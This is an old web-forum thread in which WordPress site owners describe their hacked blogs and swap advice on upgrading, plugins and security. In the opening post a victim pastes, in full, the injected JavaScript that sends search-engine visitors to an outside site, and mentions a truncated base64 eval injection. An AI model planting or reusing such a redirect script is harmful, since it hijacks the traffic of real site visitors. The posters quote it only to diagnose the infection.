Do You Want To Join The Wordpress Hacked Club?

[WendellC]

Yes, I'm now a sad member of that group.

Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.

1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.

On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run it's hack all the way through. My guess is it's probably some kind of redirect.

2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.

The only way I found out about it was my AVG detected a Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script:

<script> var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length). split("&")[0]; </script>

We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!

I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.

So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place.

Wendell

[VeitSchenk]

Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit

[VegasGreg]

I too had 5-6 WP sites hacked 2 weeks ago. They simply replaced my index page with their "you've been hacked" video. It said that they were Muslim Extremist Hackers.

Some of the sites were brand new installs that I had not even finished yet and had not backed them up yet.

[PixelPerfect]

If those guys are that clever why don't they hack the Wordpress.org site, would like to see that.

[twright]

they make a security plugin for WP, might want to gander at some of those.

keeps your eyes open, sometimes they do something simple so it appears like thats all they did.

[WendellC]

Quote:

Originally Posted by VeitSchenk

Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit

Ah, I'm embarrassed to say it but it was version 2.04! I think it was the first WP blog I ever created and I forgot to upgrade it over the years. Most of my blogs are now in the 2.6 - 2.7 range. I just have to go back and get them all upgraded to something with a few less security holes...

Right now I'm trying to see if I can upgrade it without breaking the database. I tried to do an upgrade before on another WP site and it really screwed up the categories since WP at some point made some major changes to their schema.

I might just end up installing 2.8, reposting all my content manually and taking my lumps with the permalink differences...

*sigh*

Wendell

[kameleon]

I have wordpress site, but didn't have such problems. Probably because I have only few visitors monthly.

[JohnnyPhunk]

Definitely gotta keep your WP up to date.

There's a security scan plugin that helps too.

[Paid Surveys]

I used to use wordpress. It is a very powerful piece of blogging software but after being hacked myself i went back to go old fashioned HMTL and javascript. Also wordpress has a habit of running slow at peak times and my users were getting fed up of waiting 30 seconds for a page to load up. HTML is so fast because there is little code to slow the process down and it's the same with PHP.

[GuerrillaIM]

I think a lot of WP blogs get hacked due to vulnerabilities in the plugins. Search for "plugin name + vulnerability" before installing to make sure its not a real mess and easy to hack.

[edd666666]

I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed

[JustaWizard]

Quote:

Originally Posted by edd666666

I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed

Ed, at Bluehost cpanel, click on the Wordpress Icon, then click on "my installs" and you can upgrade from there. Alternately, you can go to your wordpress dashboard for that site, and near the top there should be an "upgrade to 2.8" link.

Best,
David

[JustaWizard]

The oldest version of Wordpress I've ever used is 2.7.1 - but recently installing WP on a new site I installed 2.8 and had to delete the install because there was some kind of redirect to a link farm site. I suspect it was, ironically, a plugin named "redirect" because I deleted plugins one by one (at BlueHosts suggestion) until I isolated the offending plugin. Now I have 2.8 up and with all the plugins including "redirect" and things have been fine.

I guess that plugins and Wordpress are just vulnerable???

David

[TheRichJerksNet]

Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

James

[JustaWizard]

Quote:

Originally Posted by TheRichJerksNet

Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

James

Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

I admit I'm not green, but not a programmer-type either...

THANKS!
David

[TheRichJerksNet]

Quote:

Originally Posted by JustaWizard

Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

I admit I'm not green, but not a programmer-type either...

THANKS!
David

Sent you a PM David...

James

[WendellC]

Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

Thanks -

Wendell

[valerieSONORA]

I think I was one of the very first members.

[Tom Dean]

I had a "seasonal" blog hacked. Didn't notice for months since I rarely checked it until it was getting close to the season. Fortunately they just altered the index page. They got in through an unprotected folder as in - it had no index file.

Tom

[phantom76]

Once about 5 of my wp sites (which I wasn't updating for several months) were hacked by some saudi arabian hacker group. They defaced my front page and installed some malware which will get downloaded if you visit the page Google started showing warnings on searches as "Reported attack site". I was horrified when I saw this. (Stupid of me, I didnt even visit these sites for months).

They could hack because, i wasn't updating my wp or the plugins. After this lesson, I religiously update all my wordpress installations and plugins as soon as a new update is available. Love the admin panel upgrade option available in the newer versions of wordpress.

[TheRichJerksNet]

Quote:

Originally Posted by clickguy

Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

Thanks -

Wendell

Yeah ... Do your own updates, do not use any plugins or auto updates - This includes the auto update that wordpress has. This is a huge security risk when you do.

Also do NOT update as soon as a new release is out, wait until it is stable.

James

[MemberWing]

I second suggestion of not updating as soon as Wordpress releases next major update.
Wait few weeks until dust settles.
I.e:
*.*.Y - update is safe immediately.
*.Y - wait 2 weeks before applying.
Y.* - wait 4 weeks before applying.

Gleb

[azsno]

I've have a plugin that works easily with Wordpress, to Secure your BLOG...My WP-Padlock program secures Wordpress easily and quickly, and comes with installation video, and info on how to secure the vulnerabilities in Wordpress...

You can find the plugin in my signature below...

~AzSno...

P.S. If you're wondering about my credentials, I'm a former Network/Security Engineer in Silicon Valley. I'm certified with Cisco PIX, Checkpoint Firewalls, numerous IDS (Intrusion Detection Systems, and Nokia Firewalls and Security Devices...)...I've designed networks and security systems for eBay, Providian Financial Services, UC Berkeley, Lawrence Livermore Labs, and Cal State Hayward...Suffice it to say, I know a little about security...